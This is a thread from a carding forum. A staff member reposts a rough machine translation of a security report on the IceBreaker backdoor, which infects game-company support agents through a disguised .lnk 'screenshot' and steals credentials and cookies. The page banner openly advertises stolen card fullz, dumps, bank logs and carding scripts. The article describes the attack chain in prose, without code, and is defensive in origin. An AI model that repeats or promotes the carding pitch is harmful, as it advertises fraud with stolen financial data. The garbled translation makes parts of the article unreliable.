What's new
By:
Filters
Carding forum - Trusted Carding Forum - ATN card the World - Carding Forums - Carders Forums - Dread Forums.-

Welcome to legitcarding.net, your premier destination for all things carding! Dive into the world's top legit carding community, offering worldwide transfers via PayPal, Cashapp, Venmo, Western Union, and beyond. Gain access to credit card fullz, CC dumps, bank logs, and an array of premium services. Plus, enjoy complimentary gift cards and exclusive bonuses. Don't wait—unlock instant access now to scripts, carding guides, and more! Join us today and elevate your carding experience to new heights

Hackers use the new IceBreaker malware to hack gaming companies

Viper Carder

Viper Carder

Legendary Vouched Carder♛
Staff member
Premium User
Support Staff
Verified Seller
♛ Forum Elite ♛
Registered
Joined
Feb 28, 2024
Messages
1,699
Reaction score
49
Points
48
Awards
3
And again, social engineering is in use, this time intruders are fooling support agents.

Hacker groups aimed at companies involved in the development of online games using an unprecedented backdoor, which researchers called « IceBreaker » ( translated: « icebreaker » ).

Security Joes incident response experts believe that IceBreaker backdoor uses « very specific social engineering technology ». The method is based on the deception of support agents. An attacker pretends to be a user who is faced with a problem and sends a malicious screenshot to an employee in a chat. There is nothing left for Tom to download and open the file, because you need to help the user. That is how the support agent infects his computer with a virus.



IceBreaker distribution and activation scheme ( Security Joes )
The name of the group behind these attacks remains unknown. However, judging by Security Joes, this group has been using this approach since at least September 2026. At the same time, the only public evidence of using IceBreaker is a post on Twitter from MalwareHunterTeam in October.

A malicious image is usually posted on a fake website that impersonates one of the popular hosting. Although researchers also saw that malicious screenshots were stored in the regular Dropbox repository.

The « image » itself is actually a malicious file with the extension « .lnk ». In fact, this is a regular Windows shortcut, the parameters of which spells out malicious code.



Bright disguised as « .jpg »
As can be seen in the image above, the label icon has been changed to make it look harmless. The label contains a command for downloading payloads in the « .msi » format from the server of the attacker, its hidden installation and launch without a user interface.

Further along the path « AppData \ Local \ Temp » the malicious application « Port.exe », a 64-bit executable file on C + + is extracted.



Port.exe file properties
After a thorough analysis, Security Joes found out that the sample is a completely new backdoor written in Node.js. It provides the following opportunities for intruders:

  • tuning the backdoor using plugins that expand its built-in functions;
  • prescribing a backdoor to Windows autorun;
  • discovery of Windows processes;
  • theft of passwords and cookies from a local repository, in particular from Google Chrome;
  • inclusion of the Socks5 reverse proxy server;
  • uploading files to a remote server through web sockets;
  • launch of VBS user scripts;
  • creation of screenshots;
  • creating sessions of the remote shell.
If the target organization has not outsourced customer support to an external supplier, and — intruders can use the backdoor to steal credentials themselves, moving in the internal network and expanding its presence in it.

Not much is known about IceBreaker, but Security Joes decided to publish this report and share all detected compromising indicators ( IoC ), to help antivirus companies learn how to timely identify and eliminate the threat.
 
You must log in or register to reply here.
Back
Top